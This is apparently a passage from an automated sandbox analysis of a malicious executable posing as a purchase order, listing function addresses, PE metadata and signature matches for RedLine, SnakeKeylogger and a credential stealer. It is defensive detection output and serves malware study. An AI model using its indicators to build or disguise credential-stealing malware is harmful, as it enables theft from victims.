Source: C:\Users\user\AppData\Local\Dunlop\Grinnellia.exe	Code function: 11_2_009D6EAF	11_2_009D6EAF
Source: C:\Users\user\AppData\Local\Dunlop\Grinnellia.exe	Code function: 11_2_009D51EE	11_2_009D51EE
Source: C:\Users\user\AppData\Local\Dunlop\Grinnellia.exe	Code function: 11_2_00A0D580	11_2_00A0D580
Source: C:\Users\user\AppData\Local\Dunlop\Grinnellia.exe	Code function: 11_2_009D7F80	11_2_009D7F80
Source: C:\Users\user\AppData\Local\Dunlop\Grinnellia.exe	Code function: 11_2_00A03780	11_2_00A03780
Source: C:\Users\user\AppData\Local\Dunlop\Grinnellia.exe	Code function: 11_2_00A0C7F0	11_2_00A0C7F0
Source: C:\Users\user\AppData\Local\Dunlop\Grinnellia.exe	Code function: 11_2_00D0E0AA	11_2_00D0E0AA
Source: C:\Users\user\AppData\Local\Dunlop\Grinnellia.exe	Code function: 11_2_00D0DED0	11_2_00D0DED0
Source: C:\Program Files (x86)\Mozilla Maintenance Service\maintenanceservice.exe	Code function: 12_2_00C07C00	12_2_00C07C00
Source: C:\Program Files (x86)\Mozilla Maintenance Service\maintenanceservice.exe	Code function: 12_2_00C2A810	12_2_00C2A810
Source: C:\Program Files (x86)\Mozilla Maintenance Service\maintenanceservice.exe	Code function: 12_2_00C079F0	12_2_00C079F0
Source: C:\Program Files (x86)\Mozilla Maintenance Service\maintenanceservice.exe	Code function: 12_2_00C32D40	12_2_00C32D40
Source: C:\Program Files (x86)\Mozilla Maintenance Service\maintenanceservice.exe	Code function: 12_2_00C292A0	12_2_00C292A0
Source: C:\Program Files (x86)\Mozilla Maintenance Service\maintenanceservice.exe	Code function: 12_2_00C2EEB0	12_2_00C2EEB0
Source: C:\Program Files (x86)\Mozilla Maintenance Service\maintenanceservice.exe	Code function: 12_2_00C293B0	12_2_00C293B0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 13_2_00408C60	13_2_00408C60
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 13_2_0040DC11	13_2_0040DC11
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 13_2_00407C3F	13_2_00407C3F
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 13_2_00418CCC	13_2_00418CCC
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 13_2_00406CA0	13_2_00406CA0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 13_2_004028B0	13_2_004028B0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 13_2_0041A4BE	13_2_0041A4BE
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 13_2_00418244	13_2_00418244
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 13_2_00401650	13_2_00401650
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 13_2_00402F20	13_2_00402F20
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 13_2_004193C4	13_2_004193C4
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 13_2_00418788	13_2_00418788
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 13_2_00402F89	13_2_00402F89
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 13_2_00402B90	13_2_00402B90
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 13_2_004073A0	13_2_004073A0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 13_2_02830FE0	13_2_02830FE0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 13_2_02831347	13_2_02831347
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 13_2_02831030	13_2_02831030
Source: C:\Users\user\AppData\Local\Temp\server01.exe	Code function: 15_2_014FC530	15_2_014FC530
Source: C:\Users\user\AppData\Local\Temp\server01.exe	Code function: 15_2_014F2DD1	15_2_014F2DD1
Source: C:\Users\user\AppData\Local\Temp\server01.exe	Code function: 15_2_014F9480	15_2_014F9480
Source: C:\Users\user\AppData\Local\Temp\server01.exe	Code function: 15_2_014F19B8	15_2_014F19B8
Source: C:\Users\user\AppData\Local\Temp\server01.exe	Code function: 15_2_014FC521	15_2_014FC521
Source: C:\Users\user\AppData\Local\Temp\server01.exe	Code function: 15_2_014F946F	15_2_014F946F
Source: C:\Users\user\AppData\Local\Temp\server01.exe	Code function: 15_2_05CF9108	15_2_05CF9108
Source: C:\Users\user\AppData\Local\Temp\server01.exe	Code function: 15_2_05CF60D8	15_2_05CF60D8
Source: C:\Users\user\AppData\Local\Temp\server01.exe	Code function: 15_2_05CF8030	15_2_05CF8030
Source: C:\Users\user\AppData\Local\Temp\server01.exe	Code function: 15_2_05CF7390	15_2_05CF7390
Source: C:\Users\user\AppData\Local\Temp\server01.exe	Code function: 15_2_05CF6D48	15_2_05CF6D48
Source: C:\Users\user\AppData\Local\Temp\server01.exe	Code function: 15_2_05CF79E0	15_2_05CF79E0
Source: C:\Users\user\AppData\Local\Temp\server01.exe	Code function: 15_2_05CF15E8	15_2_05CF15E8
Source: C:\Users\user\AppData\Local\Temp\server01.exe	Code function: 15_2_05CF15F8	15_2_05CF15F8
Source: C:\Users\user\AppData\Local\Temp\server01.exe	Code function: 15_2_05CF3588	15_2_05CF3588
Source: C:\Users\user\AppData\Local\Temp\server01.exe	Code function: 15_2_05CF3598	15_2_05CF3598
Source: C:\Users\user\AppData\Local\Temp\server01.exe	Code function: 15_2_05CF0488	15_2_05CF0488
Source: C:\Users\user\AppData\Local\Temp\server01.exe	Code function: 15_2_05CF0498	15_2_05CF0498
Source: C:\Users\user\AppData\Local\Temp\server01.exe	Code function: 15_2_05CF2427	15_2_05CF2427
Source: C:\Users\user\AppData\Local\Temp\server01.exe	Code function: 15_2_05CF2438	15_2_05CF2438
Source: C:\Users\user\AppData\Local\Temp\server01.exe	Code function: 15_2_05CF46E9	15_2_05CF46E9
Source: C:\Users\user\AppData\Local\Temp\server01.exe	Code function: 15_2_05CF46F8	15_2_05CF46F8
Source: C:\Users\user\AppData\Local\Temp\server01.exe	Code function: 15_2_05CF8668	15_2_05CF8668
Source: C:\Users\user\AppData\Local\Temp\server01.exe	Code function: 15_2_05CF8678	15_2_05CF8678
Source: C:\Users\user\AppData\Local\Temp\server01.exe	Code function: 15_2_05CF51D8	15_2_05CF51D8
Source: C:\Users\user\AppData\Local\Temp\server01.exe	Code function: 15_2_05CF1190	15_2_05CF1190
Source: C:\Users\user\AppData\Local\Temp\server01.exe	Code function: 15_2_05CF11A0	15_2_05CF11A0
Source: C:\Users\user\AppData\Local\Temp\server01.exe	Code function: 15_2_05CF3140	15_2_05CF3140
Source: C:\Users\user\AppData\Local\Temp\server01.exe	Code function: 15_2_05CF3132	15_2_05CF3132
Source: C:\Users\user\AppData\Local\Temp\server01.exe	Code function: 15_2_05CF60C9	15_2_05CF60C9
Source: C:\Users\user\AppData\Local\Temp\server01.exe	Code function: 15_2_05CF0040	15_2_05CF0040
Source: C:\Users\user\AppData\Local\Temp\server01.exe	Code function: 15_2_05CF8024	15_2_05CF8024
Source: C:\Users\user\AppData\Local\Temp\server01.exe	Code function: 15_2_05CF003D	15_2_05CF003D
Source: C:\Users\user\AppData\Local\Temp\server01.exe	Code function: 15_2_05CF7380	15_2_05CF7380
Source: C:\Users\user\AppData\Local\Temp\server01.exe	Code function: 15_2_05CF4290	15_2_05CF4290
Source: C:\Users\user\AppData\Local\Temp\server01.exe	Code function: 15_2_05CF42A0	15_2_05CF42A0
Source: C:\Users\user\AppData\Local\Temp\server01.exe	Code function: 15_2_05CF0D48	15_2_05CF0D48
Source: C:\Users\user\AppData\Local\Temp\server01.exe	Code function: 15_2_05CF0D39	15_2_05CF0D39
Source: C:\Users\user\AppData\Local\Temp\server01.exe	Code function: 15_2_05CF6D37	15_2_05CF6D37
Source: C:\Users\user\AppData\Local\Temp\server01.exe	Code function: 15_2_05CF2CE8	15_2_05CF2CE8
Source: C:\Users\user\AppData\Local\Temp\server01.exe	Code function: 15_2_05CF2CE5	15_2_05CF2CE5
Source: C:\Users\user\AppData\Local\Temp\server01.exe	Code function: 15_2_05CF1E9A	15_2_05CF1E9A
Source: C:\Users\user\AppData\Local\Temp\server01.exe	Code function: 15_2_05CF1EA8	15_2_05CF1EA8
Source: C:\Users\user\AppData\Local\Temp\server01.exe	Code function: 15_2_05CF3E48	15_2_05CF3E48
Source: C:\Users\user\AppData\Local\Temp\server01.exe	Code function: 15_2_05CF3E41	15_2_05CF3E41
Source: C:\Users\user\AppData\Local\Temp\server01.exe	Code function: 15_2_05CF79D0	15_2_05CF79D0
Source: C:\Users\user\AppData\Local\Temp\server01.exe	Code function: 15_2_05CF39E1	15_2_05CF39E1
Source: C:\Users\user\AppData\Local\Temp\server01.exe	Code function: 15_2_05CF39F0	15_2_05CF39F0
Source: C:\Users\user\AppData\Local\Temp\server01.exe	Code function: 15_2_05CF08E1	15_2_05CF08E1
Source: C:\Users\user\AppData\Local\Temp\server01.exe	Code function: 15_2_05CF08F0	15_2_05CF08F0
Source: C:\Users\user\AppData\Local\Temp\server01.exe	Code function: 15_2_05CF2880	15_2_05CF2880
Source: C:\Users\user\AppData\Local\Temp\server01.exe	Code function: 15_2_05CF2890	15_2_05CF2890
Source: C:\Users\user\AppData\Local\Temp\server01.exe	Code function: 15_2_05CF4B40	15_2_05CF4B40
Source: C:\Users\user\AppData\Local\Temp\server01.exe	Code function: 15_2_05CF4B50	15_2_05CF4B50
Source: C:\Users\user\AppData\Local\Temp\server01.exe	Code function: 15_2_05CF1A40	15_2_05CF1A40
Source: C:\Users\user\AppData\Local\Temp\server01.exe	Code function: 15_2_05CF1A50	15_2_05CF1A50
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Code function: 16_2_030CB490	16_2_030CB490
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Code function: 16_2_030CB470	16_2_030CB470
Source: C:\Users\user\AppData\Local\Dunlop\Grinnellia.exe	Code function: 22_2_00B53AE8	22_2_00B53AE8
Source: C:\Users\user\AppData\Local\Dunlop\Grinnellia.exe	Code function: 22_2_0304515C	22_2_0304515C
Source: C:\Users\user\AppData\Local\Dunlop\Grinnellia.exe	Code function: 22_2_03035980	22_2_03035980
Source: C:\Users\user\AppData\Local\Dunlop\Grinnellia.exe	Code function: 22_2_03006EAF	22_2_03006EAF
Source: C:\Users\user\AppData\Local\Dunlop\Grinnellia.exe	Code function: 22_2_030439A3	22_2_030439A3
Source: C:\Users\user\AppData\Local\Dunlop\Grinnellia.exe	Code function: 22_2_030051EE	22_2_030051EE
Source: C:\Users\user\AppData\Local\Dunlop\Grinnellia.exe	Code function: 22_2_03007F80	22_2_03007F80
Source: C:\Users\user\AppData\Local\Dunlop\Grinnellia.exe	Code function: 22_2_03033780	22_2_03033780
Source: C:\Users\user\AppData\Local\Dunlop\Grinnellia.exe	Code function: 22_2_0303C7F0	22_2_0303C7F0
Source: C:\Users\user\AppData\Local\Dunlop\Grinnellia.exe	Code function: 22_2_0303D580	22_2_0303D580

Source: C:\Program Files (x86)\Mozilla Maintenance Service\maintenanceservice.exe

Process token adjusted: Load Driver

Jump to behavior

Source: C:\Program Files (x86)\Mozilla Maintenance Service\maintenanceservice.exe

Process token adjusted: Security

Jump to behavior

Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: String function: 0040E1D8 appears 44 times
Source: C:\Users\user\Desktop\PO #09465610_GQ 003745_SO-242000846.exe	Code function: String function: 0042F8A0 appears 35 times
Source: C:\Users\user\Desktop\PO #09465610_GQ 003745_SO-242000846.exe	Code function: String function: 00426AC0 appears 41 times
Source: C:\Users\user\Desktop\PO #09465610_GQ 003745_SO-242000846.exe	Code function: String function: 0041EC2F appears 68 times

Source: 117.0.5938.132_chrome_installer.exe.3.dr	Static PE information: Resource name: B7 type: 7-zip archive data, version 0.4
Source: 117.0.5938.132_chrome_installer.exe.3.dr	Static PE information: Resource name: BL type: Microsoft Cabinet archive data, Windows 2000/XP setup, 1522998 bytes, 1 file, at 0x2c +A "setup.exe", number 1, 133 datablocks, 0x1203 compression
Source: Acrobat.exe.3.dr	Static PE information: Resource name: RT_STRING type: DOS executable (COM, 0x8C-variant)
Source: SingleClientServicesUpdater.exe.3.dr	Static PE information: Resource name: 7Z type: 7-zip archive data, version 0.4

Source: identity_helper.exe.3.dr	Static PE information: Number of sections : 12 > 10
Source: ie_to_edge_stub.exe.3.dr	Static PE information: Number of sections : 11 > 10
Source: msedge_proxy.exe0.3.dr	Static PE information: Number of sections : 12 > 10
Source: notification_click_helper.exe.3.dr	Static PE information: Number of sections : 13 > 10
Source: pwahelper.exe0.3.dr	Static PE information: Number of sections : 12 > 10
Source: msedge_proxy.exe.3.dr	Static PE information: Number of sections : 12 > 10
Source: setup.exe.3.dr	Static PE information: Number of sections : 13 > 10
Source: elevation_service.exe.3.dr	Static PE information: Number of sections : 12 > 10
Source: msedgewebview2.exe.3.dr	Static PE information: Number of sections : 14 > 10
Source: pwahelper.exe.3.dr	Static PE information: Number of sections : 12 > 10
Source: msedge_pwa_launcher.exe.3.dr	Static PE information: Number of sections : 13 > 10
Source: elevation_service.exe0.3.dr	Static PE information: Number of sections : 12 > 10

Source: PO #09465610_GQ 003745_SO-242000846.exe, 00000000.00000003.2060455505.0000000003F20000.00000004.00001000.00020000.00000000.sdmp	Binary or memory string: OriginalFilenameALG.exej% vs PO #09465610_GQ 003745_SO-242000846.exe
Source: PO #09465610_GQ 003745_SO-242000846.exe, 00000000.00000003.2053821168.0000000003EC0000.00000004.00001000.00020000.00000000.sdmp	Binary or memory string: OriginalFilenamearmsvc.exeN vs PO #09465610_GQ 003745_SO-242000846.exe

Source: unknown

Driver loaded: C:\Windows\System32\drivers\AppVStrm.sys

Source: PO #09465610_GQ 003745_SO-242000846.exe

Static PE information: EXECUTABLE_IMAGE, LARGE_ADDRESS_AWARE, 32BIT_MACHINE

Source: 11.2.Grinnellia.exe.48a0000.1.raw.unpack, type: UNPACKEDPE	Matched rule: MALWARE_Win_RedLine snort2_sid = 920072-920073, author = ditekSHen, description = Detects RedLine infostealer, clamav_sig = MALWARE.Win.Trojan.RedLine-1, MALWARE.Win.Trojan.RedLine-2, snort3_sid = 920072-920073
Source: 13.2.RegSvcs.exe.3d24dc0.10.unpack, type: UNPACKEDPE	Matched rule: Windows_Trojan_SnakeKeylogger_af3faa65 os = windows, severity = x86, creation_date = 2021-04-06, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.SnakeKeylogger, fingerprint = 15f4ef2a03c6f5c6284ea6a9013007e4ea7dc90a1ba9c81a53a1c7407d85890d, id = af3faa65-b19d-4267-ac02-1a3b50cdc700, last_modified = 2021-08-23
Source: 13.2.RegSvcs.exe.3d24dc0.10.unpack, type: UNPACKEDPE	Matched rule: MAL_Envrial_Jan18_1 date = 2018-01-21, hash2 = 9edd8f0e22340ecc45c5f09e449aa85d196f3f506ff3f44275367df924b95c5d, hash1 = 9ae3aa2c61f7895ba6b1a3f85fbe36c8697287dc7477c5a03d32cf994fdbce85, author = Florian Roth, description = Detects Encrial credential stealer malware, reference = https://twitter.com/malwrhunterteam/status/953313514629853184, license = https://creativecommons.org/licenses/by-nc/4.0/
Source: 13.2.RegSvcs.exe.3d54e10.14.unpack, type: UNPACKEDPE	Matched rule: Windows_Trojan_SnakeKeylogger_af3faa65 os = windows, severity = x86, creation_date = 2021-04-06, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.SnakeKeylogger, fingerprint = 15f4ef2a03c6f5c6284ea6a9013007e4ea7dc90a1ba9c81a53a1c7407d85890d, id = af3faa65-b19d-4267-ac02-1a3b50cdc700, last_modified = 2021-08-23
Source: 13.2.RegSvcs.exe.3d54e10.14.unpack, type: UNPACKEDPE	Matched rule: MAL_Envrial_Jan18_1 date = 2018-01-21, hash2 = 9edd8f0e22340ecc45c5f09e449aa85d196f3f506ff3f44275367df924b95c5d, hash1 = 9ae3aa2c61f7895ba6b1a3f85fbe36c8697287dc7477c5a03d32cf994fdbce85, author = Florian Roth, description = Detects Encrial credential stealer malware, reference = https://twitter.com/malwrhunterteam/status/953313514629853184, license = https://creativecommons.org/licenses/by-nc/4.0/
Source: 8.2.Grinnellia.exe.48a0000.1.raw.unpack, type: UNPACKEDPE	Matched rule: MALWARE_Win_RedLine snort2_sid = 920072-920073, author = ditekSHen, description = Detects RedLine infostealer, clamav_sig = MALWARE.Win.Trojan.RedLine-1, MALWARE.Win.Trojan.RedLine-2, snort3_sid = 920072-920073
Source: 22.2.Grinnellia.exe.4090000.1.raw.unpack, type: UNPACKEDPE	Matched rule: MALWARE_Win_RedLine snort2_sid = 920072-920073, author = ditekSHen, description = Detects RedLine infostealer, clamav_sig = MALWARE.Win.Trojan.RedLine-1, MALWARE.Win.Trojan.RedLine-2, snort3_sid = 920072-920073
Source: 13.2.RegSvcs.exe.400000.0.unpack, type: UNPACKEDPE	Matched rule: MALWARE_Win_RedLine snort2_sid = 920072-920073, author = ditekSHen, description = Detects RedLine infostealer, clamav_sig = MALWARE.Win.Trojan.RedLine-1, MALWARE.Win.Trojan.RedLine-2, snort3_sid = 920072-920073
Source: 13.2.RegSvcs.exe.3d54e10.14.raw.unpack, type: UNPACKEDPE	Matched rule: Windows_Trojan_SnakeKeylogger_af3faa65 os = windows, severity = x86, creation_date = 2021-04-06, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.SnakeKeylogger, fingerprint = 15f4ef2a03c6f5c6284ea6a9013007e4ea7dc90a1ba9c81a53a1c7407d85890d, id = af3faa65-b19d-4267-ac02-1a3b50cdc700, last_modified = 2021-08-23
Source: 13.2.RegSvcs.exe.3d54e10.14.raw.unpack, type: UNPACKEDPE	Matched rule: MAL_Envrial_Jan18_1 date = 2018-01-21, hash2 = 9edd8f0e22340ecc45c5f09e449aa85d196f3f506ff3f44275367df924b95c5d, hash1 = 9ae3aa2c61f7895ba6b1a3f85fbe36c8697287dc7477c5a03d32cf994fdbce85, author = Florian Roth, description = Detects Encrial credential stealer malware, reference = https://twitter.com/malwrhunterteam/status/953313514629853184, license = https://creativecommons.org/licenses/by-nc/4.0/
Source: 15.0.server01.exe.e40000.0.unpack, type: UNPACKEDPE	Matched rule: Windows_Trojan_SnakeKeylogger_af3faa65 os = windows, severity = x86, creation_date = 2021-04-06, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.SnakeKeylogger, fingerprint = 15f4ef2a03c6f5c6284ea6a9013007e4ea7dc90a1ba9c81a53a1c7407d85890d, id = af3faa65-b19d-4267-ac02-1a3b50cdc700, last_modified = 2021-08-23
Source: 15.0.server01.exe.e40000.0.unpack, type: UNPACKEDPE	Matched rule: MAL_Envrial_Jan18_1 date = 2018-01-21, hash2 = 9edd8f0e22340ecc45c5f09e449aa85d196f3f506ff3f44275367df924b95c5d, hash1 = 9ae3aa2c61f7895ba6b1a3f85fbe36c8697287dc7477c5a03d32cf994fdbce85, author = Florian Roth, description = Detects Encrial credential stealer malware, reference = https://twitter.com/malwrhunterteam/status/953313514629853184, license = https://creativecommons.org/licenses/by-nc/4.0/
Source: 13.2.RegSvcs.exe.3d3cdf0.12.unpack, type: UNPACKEDPE	Matched rule: Windows_Trojan_SnakeKeylogger_af3faa65 os = windows, severity = x86, creation_date = 2021-04-06, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.SnakeKeylogger, fingerprint = 15f4ef2a03c6f5c6284ea6a9013007e4ea7dc90a1ba9c81a53a1c7407d85890d, id = af3faa65-b19d-4267-ac02-1a3b50cdc700, last_modified = 2021-08-23
Source: 13.2.RegSvcs.exe.3d3cdf0.12.unpack, type: UNPACKEDPE	Matched rule: MAL_Envrial_Jan18_1 date = 2018-01-21, hash2 = 9edd8f0e22340ecc45c5f09e449aa85d196f3f506ff3f44275367df924b95c5d, hash1 = 9ae3aa2c61f7895ba6b1a3f85fbe36c8697287dc7477c5a03d32cf994fdbce85, author = Florian Roth, description = Detects Encrial credential stealer malware, reference = https://twitter.com/malwrhunterteam/status/953313514629853184, license = https://creativecommons.org/licenses/by-nc/4.0/
Source: 13.2.RegSvcs.exe.3d3cdf0.12.raw.unpack, type: UNPACKEDPE	Matched rule: Windows_Trojan_SnakeKeylogger_af3faa65 os = windows, severity = x86, creation_date = 2021-04-06, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.SnakeKeylogger, fingerprint = 15f4ef2a03c6f5c6284ea6a9013007e4ea7dc90a1ba9c81a53a1c7407d85890d, id = af3faa65-b19d-4267-ac02-1a3b50cdc700, last_modified = 2021-08-23
Source: 13.2.RegSvcs.exe.3d3cdf0.12.raw.unpack, type: UNPACKEDPE	Matched rule: MAL_Envrial_Jan18_1 date = 2018-01-21, hash2 = 9edd8f0e22340ecc45c5f09e449aa85d196f3f506ff3f44275367df924b95c5d, hash1 = 9ae3aa2c61f7895ba6b1a3f85fbe36c8697287dc7477c5a03d32cf994fdbce85, author = Florian Roth, description = Detects Encrial credential stealer malware, reference = https://twitter.com/malwrhunterteam/status/953313514629853184, license = https://creativecommons.org/licenses/by-nc/4.0/
Source: 13.2.RegSvcs.exe.400000.0.raw.unpack, type: UNPACKEDPE	Matched rule: MALWARE_Win_RedLine snort2_sid = 920072-920073, author = ditekSHen, description = Detects RedLine infostealer, clamav_sig = MALWARE.Win.Trojan.RedLine-1, MALWARE.Win.Trojan.RedLine-2, snort3_sid = 920072-920073
Source: 13.2.RegSvcs.exe.3d24dc0.10.raw.unpack, type: UNPACKEDPE	Matched rule: Windows_Trojan_SnakeKeylogger_af3faa65 os = windows, severity = x86, creation_date = 2021-04-06, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.SnakeKeylogger, fingerprint = 15f4ef2a03c6f5c6284ea6a9013007e4ea7dc90a1ba9c81a53a1c7407d85890d, id = af3faa65-b19d-4267-ac02-1a3b50cdc700, last_modified = 2021-08-23
Source: 13.2.RegSvcs.exe.3d24dc0.10.raw.unpack, type: UNPACKEDPE	Matched rule: MAL_Envrial_Jan18_1 date = 2018-01-21, hash2 = 9edd8f0e22340ecc45c5f09e449aa85d196f3f506ff3f44275367df924b95c5d, hash1 = 9ae3aa2c61f7895ba6b1a3f85fbe36c8697287dc7477c5a03d32cf994fdbce85, author = Florian Roth, description = Detects Encrial credential stealer malware, reference = https://twitter.com/malwrhunterteam/status/953313514629853184, license = https://creativecommons.org/licenses/by-nc/4.0/
Source: 0000000B.00000002.2130937070.00000000048A0000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY	Matched rule: MALWARE_Win_RedLine snort2_sid = 920072-920073, author = ditekSHen, description = Detects RedLine infostealer, clamav_sig = MALWARE.Win.Trojan.RedLine-1, MALWARE.Win.Trojan.RedLine-2, snort3_sid = 920072-920073
Source: 0000000F.00000000.2131836029.0000000000E42000.00000002.00000001.01000000.0000000A.sdmp, type: MEMORY	Matched rule: Windows_Trojan_SnakeKeylogger_af3faa65 os = windows, severity = x86, creation_date = 2021-04-06, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.SnakeKeylogger, fingerprint = 15f4ef2a03c6f5c6284ea6a9013007e4ea7dc90a1ba9c81a53a1c7407d85890d, id = af3faa65-b19d-4267-ac02-1a3b50cdc700, last_modified = 2021-08-23
Source: 00000008.00000002.2100925791.00000000048A0000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY	Matched rule: MALWARE_Win_RedLine snort2_sid = 920072-920073, author = ditekSHen, description = Detects RedLine infostealer, clamav_sig = MALWARE.Win.Trojan.RedLine-1, MALWARE.Win.Trojan.RedLine-2, snort3_sid = 920072-920073
Source: 0000000D.00000002.2133035996.0000000000400000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY	Matched rule: MALWARE_Win_RedLine snort2_sid = 920072-920073, author = ditekSHen, description = Detects RedLine infostealer, clamav_sig = MALWARE.Win.Trojan.RedLine-1, MALWARE.Win.Trojan.RedLine-2, snort3_sid = 920072-920073
Source: 00000016.00000002.2263738666.0000000004090000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY	Matched rule: MALWARE_Win_RedLine snort2_sid = 920072-920073, author = ditekSHen, description = Detects RedLine infostealer, clamav_sig = MALWARE.Win.Trojan.RedLine-1, MALWARE.Win.Trojan.RedLine-2, snort3_sid = 920072-920073
Source: 0000000D.00000002.2139311354.0000000003D0C000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY	Matched rule: Windows_Trojan_SnakeKeylogger_af3faa65 os = windows, severity = x86, creation_date = 2021-04-06, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.SnakeKeylogger, fingerprint = 15f4ef2a03c6f5c6284ea6a9013007e4ea7dc90a1ba9c81a53a1c7407d85890d, id = af3faa65-b19d-4267-ac02-1a3b50cdc700, last_modified = 2021-08-23
Source: Process Memory Space: RegSvcs.exe PID: 3252, type: MEMORYSTR	Matched rule: Windows_Trojan_SnakeKeylogger_af3faa65 os = windows, severity = x86, creation_date = 2021-04-06, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.SnakeKeylogger, fingerprint = 15f4ef2a03c6f5c6284ea6a9013007e4ea7dc90a1ba9c81a53a1c7407d85890d, id = af3faa65-b19d-4267-ac02-1a3b50cdc700, last_modified = 2021-08-23
Source: Process Memory Space: server01.exe PID: 4324, type: MEMORYSTR	Matched rule: Windows_Trojan_SnakeKeylogger_af3faa65 os = windows, severity = x86, creation_date = 2021-04-06, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.SnakeKeylogger, fingerprint = 15f4ef2a03c6f5c6284ea6a9013007e4ea7dc90a1ba9c81a53a1c7407d85890d, id = af3faa65-b19d-4267-ac02-1a3b50cdc700, last_modified = 2021-08-23
Source: C:\Users\user\AppData\Local\Temp\server01.exe, type: DROPPED	Matched rule: Windows_Trojan_SnakeKeylogger_af3faa65 os = windows, severity = x86, creation_date = 2021-04-06, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.SnakeKeylogger, fingerprint = 15f4ef2a03c6f5c6284ea6a9013007e4ea7dc90a1ba9c81a53a1c7407d85890d, id = af3faa65-b19d-4267-ac02-1a3b50cdc700, last_modified = 2021-08-23
Source: C:\Users\user\AppData\Local\Temp\server01.exe, type: DROPPED	Matched rule: MAL_Envrial_Jan18_1 date = 2018-01-21, hash2 = 9edd8f0e22340ecc45c5f09e449aa85d196f3f506ff3f44275367df924b95c5d, hash1 = 9ae3aa2c61f7895ba6b1a3f85fbe36c8697287dc7477c5a03d32cf994fdbce85, author = Florian Roth, description = Detects Encrial credential stealer malware, reference = https://twitter.com/malwrhunterteam/status/953313514629853184, license = https://creativecommons.org/licenses/by-nc/4.0/

Source: PO #09465610_GQ 003745_SO-242000846.exe	Static PE information: Section: .reloc IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_DISCARDABLE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
Source: armsvc.exe.0.dr	Static PE information: Section: .reloc IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_DISCARDABLE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
Source: alg.exe.0.dr	Static PE information: Section: .reloc IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_DISCARDABLE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
Source: AppVClient.exe.0.dr	Static PE information: Section: .reloc IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_DISCARDABLE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
Source: Grinnellia.exe.0.dr	Static PE information: Section: .reloc IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_DISCARDABLE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
Source: DiagnosticsHub.StandardCollector.Service.exe.0.dr	Static PE information: Section: .reloc IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_DISCARDABLE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
Source: minidump-analyzer.exe.3.dr	Static PE information: Section: .reloc IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_DISCARDABLE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
Source: pingsender.exe.3.dr	Static PE information: Section: .reloc IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_DISCARDABLE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
Source: GoogleCrashHandler64.exe.3.dr	Static PE information: Section: .reloc IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_DISCARDABLE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
